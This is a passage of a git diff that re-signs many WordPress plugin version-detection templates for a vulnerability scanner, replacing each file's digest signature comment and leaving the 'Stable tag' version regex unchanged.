4a0a00473045022100e78ba92eb229e3d94cc34e9efa103f7477196251aced09cfd430b1a673f94cfe0220626c14c52f6599c2db71df9a2440bb59a9093c6416089bc4cee5ab0fa7490a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 99ab04096d..5d3f717f19 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e59f8465618462ad9f3c1459ca0d2ce6de5d643bea4a3e29ef4cad59a9714c5d02203eedcf326065b7ac800e24b2c8449fc13ebad67faa0ec9227a73d5d7150a6506:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220275b0184b2444dc21889a776ac91c8ee85ee77417d48e86e6f4a71be2d1caf00022100802c1dfc837f391e5ff63559e64a79931787ab4ec72ccbc7fa7124ac7619f7ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index dc608d21e5..3f9a5dffb7 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203278119ae6077c597c7edaceb66b6a6c8c8651f8f567466c38d9d1a27747a67d022100b38de48a8d9af192e662ccbc2290b973aeb4395b3aef74d49b465eafc3ca031d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203533fbf5221e5a83054e8fe53e9ce52a4674c24a8e4e1a8d9e7615459666061102206ebe610e08008e1f86995958a66ab94bd7c1f478e9988ed880abcceea4c18ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 6766375588..4dfc307670 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ed9f88b363faca5ea14bf95a43e7c6adeba43ac5cdae01b8274f9ad72e5f38a02200a8150b2440b14d8511ac3df70096b795f80c0f4833ce008670fa3b924a6d416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200ef1a1c7e2ab48765a2b09278d303bea73fc623bbf04e6d5b6dc4b3cd03fac5902204c8833861ea21ccf980b303e5fe66a38a00fe12287cf1a347c5d3a673d093d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index c90f76bc92..5b3fbb340f 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025ed321a0f6c3c498e81cd731fbdfeed9c00abfcdfa73143c23549e1a6989f2c02203fc103f05e51c85183dc86ed23782747efae5fa64bc18fb5ff4a4d444844ee16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022024f368719e7614b2c5d16500602080586683362b85f11b4b70f7f1193f53854d022100b91cb38cefc49816ba3a2d9b35569227f48da51fe9fc92181c7001a22c3f9286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 9ea111f91d..d7bb7dff60 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ab796e909354ce3865621f3e751d70dda174c4b00f390f8dc8bd9466d609dcc022064a60c1b9b67dc608201743f4aa7bfe4bc6fa768c367f732af86b0ed89ca6740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022061e196fd4035d2573630b3291466e36113bf4f35e489fd06f761709f0c77ec9a02205f59749826baba2f7845485a66fb31c73793713f22d3adc45ba1cb1accb3f98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 09e2777f14..1ddb70615e 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bbd749cc66421f9785b5cd52a587a43995798964e25c3c36088a107f6363f910022100a561c04853068e94677f6c6c85158942015101f25bed9614cfe672ed60f6911d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100af96e6c03ee7e9313cef314990480e150d4a6d84f86f03d55c97927e5444137b022100fe9e5157c0ef88ee8b9856ae3b870b85467b5a83eec90046b454dacbd7952d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 475c6852f3..3375b75a35 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207de1487194d93a509ee6e33c1554e3f7e50cce5e226821aebc5e0417fa94dd990221009373223ff2446981321c27dd4c53b9089a0c238d00c93cad37d1480dcbc130c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201ef2a9f4a06658475656df0fa59f51536d0ae3e48fbc44f1cbba8fabdcb1f4b3022063437e04ab0c538042d94347f7111e1ddc0bdd487464e87eaffe6c7315134a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f16048a0cd..2544f30751 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a41c02687e2270c150162eb487d0edc47124d974d569eea359f19466e26833d4022100bf43e794edaf3155adb01a8cf1922975cccfcd01f7f493746ff9661a3ca0f3f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100894816eb0cd24993d39d6cb4046e2bdfd9557fdc5e14c92d1787371fcfbac9a702204f30e72f39a5af687fbc48ce25fc44c6b34f5ceefab876982bf735b8dee803fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 64e6162582..f8340d5310 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f3d11772d15499e05eced5c6b02ad4535bc772ffe3b11bfeb39804ebe4fa349f02201374f301087c69e438b8ac598bed39291aef5d05bb00233b0ee55f748fe65b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022055f24796483fbc5e5b1b9812199f17b70772908a2d3c75eb9248dcc1d18abee502201db08a9742bdb99062fb0390f77f384a8803b85402a83ec9d42875fb90964e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index d0e2d26808..d8adcd05ee 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201458f723dda55154afec7b83d81bd7573aaf9127ae161d1a0f02651939226ab402206c23a9f6fb2ab19161bb80f635d880843ecce3dc749da38894bcfd6e89ffc6bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022013ab2df34a25f263388953d0ec625219d327ef2070e554bcb1bb44aa50b31bde02202980ff8c4141e5db2c962c1b5ef2a5b894ca5cba7e778e0aca34de5a906e5846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 469a1a42e2..79d3e7b785 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e585a7e0b4a9756f61593a6c9a12082ba6904eefb9b0f3a1b7def725b9ab4572022073841cbac806096fc48cbd34f8b5a3b3b9553c11fddd51480f423776aa55ecb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f71baed2d8950e75565342467a889097db1211fc11ab863cc12e40277e8d339d022001166d185170fd4c0ee05858f4f5bb86798c39374d87d6d8c30aaf01601dae26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index d761728695..42dfabf5af 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204644da8134a8cfefae8606eddbbc665dad2cdbef2ffbc4677eb24e0a709ecb9a022100c69fee6501a35f39beabb21ae7edbe4ee2ccd295ea154634fa1f5ce1b32cbc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022075c648aea043f42b152b5b2f885802724b6e23f17d2a4d72a262ba8cafd4b4130220339b97357c795cd591dc87aae80222a76d7e2a855b6135ce5d7f4bd15f857560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 9427c94f5f..f81cc9781d 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070c82e52acd47c16e239b15f25b4cfebc2a4d3f7b2d62df07cf20d5b059c25d402207cf925c4ceba05669c772e53257005007be080f5a6efc6bd5de1679355661b49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022053c55b165b61e2f66ac59b33bfe518a7bb36511b7978c6ee6bba88b3fbfd13b7022032811e60a4f3726c746bfbb2f24fc0ed6326d5ac10cbf1e822ea73c7ffd65551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 097c774ff1..dc56556270 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100874ed825fcd78569ae945970fed4562aba1259d93a2101344afdd3079d169137022074b0f51108692693d3f7a3536a6663970f25c523009283701cd58b1e05a73937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202d8861deb18ffd1b18d5b8b58ec1b818c1615a3f95d3ae2e16be9a629f8e4f1002201c3414a67ff9fb0b099fdcc978f135c1f7162dfc24777d88edd44c685f30fcd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 23680b3985..6340bd4e68 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fea8c2c4fa61271afda29b54b637856dd83aeb22aacf4023e8e9e9c9445723c8022100fcbc65a35e690783b4c687d3b3263b29051f08bfb1a511419b43bb95f345fbde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220282dce68f1ea57e8a8f9d614d02cdf67e45601be99c332d13b236dc37a34d5d10220013f283423d38999fd9376911a455a427ad8cf0936a17ea6c76c1c44de1f4c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 76154789b5..0a0fbea596 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024d624c83b6d2374400af959513eb418c426eeba5d731724c018b8bacadfabe20221008cb4f28cc8b22160e670e9343bad5b8d9f28922eb7b02519f460fb2736147654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fe47c658afc49c4568c26a68dded41758da227b8071608311cb1f694400acbe302204267a528855adfa3e0ac1935c1cd973aa0c20267640f0d69d1d0683701c35554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1bf647594b..7a675ad43f 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084a58c2bbd4b8f9f2f4e2894a3b7b8b1a1f8e883944c56fb9b5f822b3081107a02203087666ac8a86aba5a4ff379d5b267afb8afb39d820797a63a25d91ea95c7c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206e828836cc4f92ecb7170a15acf849608d5d0ceaf9b43875927bf32dcf177f23022100dbbc37f35c4970d3b7666dfdf01c4d3242376a08dce9fb6307452b9cb3eb0c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 038c122726..745de03bc3 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d77832d3eb2a1a2ecaa576bc52971e650c85cce10440ea11f81bf7c9f59703db022100a818d16a06e25bef000bac3f2dd89b9b430a84d245bc32dce336cae564e60e0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202dbd9e79a42f42c2563785cb9adcaf4a548258962f2790086a9e908e98fbbda9022100b354d5a462e4176f1b7b22843a5fcdef8fc64a101898eda4b9cf297bb98aff05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 784b7d950c..5ec25ed5b3 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e40a074c1b4b0fdec0ddf9e0e37d35a6967b39e4aab4de04bc9e9359bbb2f2e902203979912a604399af10e48cd9d7ec0d0922d4ff2ff2b9278d8a991840db24ef47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202544d6202a9ac06cbc072ceca7541cd3d6d6e521f00803e8e1e7751f13dec09d022028a1ef292cd522cba049dfe93e11fb19cb35abe232cf6cd01434a700c48b6fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 834b3907f5..d3c6cd6b55 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207269b7e8c285ec1f035e4da9123b107ad6f91a38a1125d7e38ebf762d757147a0220378e6cb529f703ae182ef3be7fb8e26815d5ceeb182fabab7cddcc6edf47167e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022023dc2ffc14c205a0c88b20b778e3bf3fc59592d7f54d3f865e1225621caefe7c022100f43466814d8a21c4164416821354a4c4bf40a1e63d3e9d936db43ebc82734ef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 332f93e540..20b59b3662 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220314bafc2309100ff3a04e5ad032deeba13b3143ab7087c57f110fcb2ba3e9f5e022100d8b11ac35bff3cea7da35bc01240da4c0d848e4301be9b78cdb2969f00f98397:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100df5cffee411fb641ffa6adff7cf5433ba7ca4f5316e41e91f509c296974f1659022100f634f3d7a2272970dd5460469e97c60b819232c282269cbecedc7158720cd99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index e3b162776d..2414647a97 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009774fa325f630a1c65e6ebc70d883fa558d22fc4fcb9bbbd24f5748eb194fb09022076f7190e4a953794d7e1b8fbff93e8d7fd72890e8ea30781e213e768c63d8f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e227651b3d98f5cce850bf4f5e7b788041f11c8b4d819922913783974f6a28e30220206b6f531ca430374fc2517ba9f56466b54fa97ac705eccc9617754cf9ca2479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index b769194b6c..725bc16d68 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd0435f75983014fcedeca22443c752fff89f809143d72b365a125a1f4f8f3f3022100baba68052d63990d34026b4b9d669a8d99e69c158788d6a94c15873ba6222f48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c6a352e21a996d66b1d39929877395e6a55f488a2e0a367b025f140512c12b0a022100b44284f8fed70643725ac8a74ddb82b21f8a86686a82fbb8c59a39aca1fea458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index de3049c704..efa7fe88cd 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8bce1214fcbb7b0506ff6eff4145d423bfdf99bafac5d994b5aede0b44adb3402206592f09a802949922d575ee41681ef1202e1985ab59209e5d3518425228e3977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100db0eed895671f444d1fa48c824b59d6cd558df191515c6f36efc016d0a0e9583022100c6537c157e3ea3af76261eea512c2afedb8c043e107554f3beaacd481a113e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 71661d2efd..10d7fc80dd 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf00f12f208fde44f03fb656388386c728c622196062a39d7dcd89ddbc3e26c0022100b8b5776b084b4a91c0d729d9372cc01c0014640867fe5f20608dfcf80a2b4df9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100af074c8bfdc7905efebac0f53f389af9428c114dfb7d83fce0a792a1a9a10d6a022100a132d0b4ed87bf0563fd80c2c7bb3c4242b801bbf0bd8068ddda4b1d46d65cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ed18a62089..85de32ab25 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204347d1a4219ed36f3a7d9a276aa6c2eb629392661bce1ce3e2999b9534e461a302206db384cdd891a8065154468a1b52ae9386a0581f7db35f083648c5d4ea4f02fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201249ce89b4974c6fa84a9fa7c43581c60350c6cef18415f4369cbb8f43d67faf022100b202d9380913e0b6b1ca68528c4aedc4389ea6f6e9dcda46b565d18d275ccfc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index e675616ca1..d4e436da28 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2d6c41d9ec8ac6c2a469042e79454e4a5c7ae7744e14873612f1c27d3d6b68d0220036725a5c2ec8c59b435510c13b3b0e6842b775abce7cdf17096a2a59b9c8f8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d39a1a996c713b15233ebc1ed4ab6d0aedad348a6dea6a56ca40927822756827022029fcbbf09cc4703e243e83de0e05602137beffd61cce930b8cc005018ddde65e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 170c5d134e..3436e3bc58 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097ab9bf62ff10d0cbbf6818c9e2b4fccfeb3d17f26f8bf0e8cf0fc3277a30d11022100d1c4f5dafdc037c2652fd17f3a5f1f6bdfd4b9e1c1b883a06b59edd5d90401fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022075bdf446b002f422938fc10c869e0a54add07cb916c50e423e8dee9dac05e95102210098e0d52a551b6114563074ec6e8a2cd07b20453eebedec387dcffc288fbad2b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 5955532089..ade3067c4a 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004f2da8c446aa9ea4b255214b34e5e5966ed14dbb6b896a1cf085734103f960502206ca5e634a3a9a7c97763967a8c1e05e5ed25a35e92674e8ca6b111e90462e80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100daf23d342ba1dd0a48c5ef5b638f9a6e09c7c05df58263416ef316e31a8603e102206c049d02fbf2fbd5f9668b809d8af8c1b22381bc4f409aeee304b95b503a36bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 54cba8ffd2..4ce69aa8fd 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d124d7e33017a20629190715a6fa018bbee37736f45bf0c6f4a10e0c5b92953d022100d2200f7cee33e53ed23906131cc489ff9cfe0f609a19a8df05e60223a44a9977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220475a2393b15e2831fbb1cb29b70e2a8a17dade0e51afed6cf6a29307d1d1e115022100a58010af8d038ed86252eb375abe93d9126d55759b6052e8cdca84400e089deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a7bebbe192..7d85979888 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019b07405fa983bb37aa9a6b5faf89fb5d941f22933dd57aff99252adacd5df52022025e4bd195d97743b3f5687087672cec27fc47b1af031c0d303795752a709b91d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d9973ef51f4a9116c5d946118ac99a557053951f036e0151d8d8101d0a70bc1902203e4a56ce9cfd2f0a23b41ec0c767360ea14720a8f7e418cd386de166e67c0703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 0af748671b..7266ed480e 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200dba0f2d63b633362ab7051b400bcdb24ccf605e3750070b764c4a091e7a24ee0220612a0d8f96d3987ddb6d6815c180675f6e629b886d32cd55ba42049a15e256cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204c74f508432143338dbb89fe16872f7e6ce6d7bfee65444d0d54502dfb4bd8fe022100fa924cc717c1e64cc668eb956f485bdf0756a0abf2369216016362bed41ceaee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index b97e21a015..d70ac32c33 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a02abf52ba30cdfd363b516c3b6346af1f2a51a7c41e48aeb3d1f96d64495a57022100c8b0a16b2eae1fd2fed944215687f875eac36d8caecf1c8aa238ad681cf2aac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f7917698b89d8f68c09e0c42c95cd4dfa05d52d4eda6ecac99680987cde70ae602207b0184b0caaceae0eee1ec9ee13ae4544b7242f546b40e9d43b5d5e7f8de745d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ea450d5a44..1554e87b79 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,5 @@ http: part: 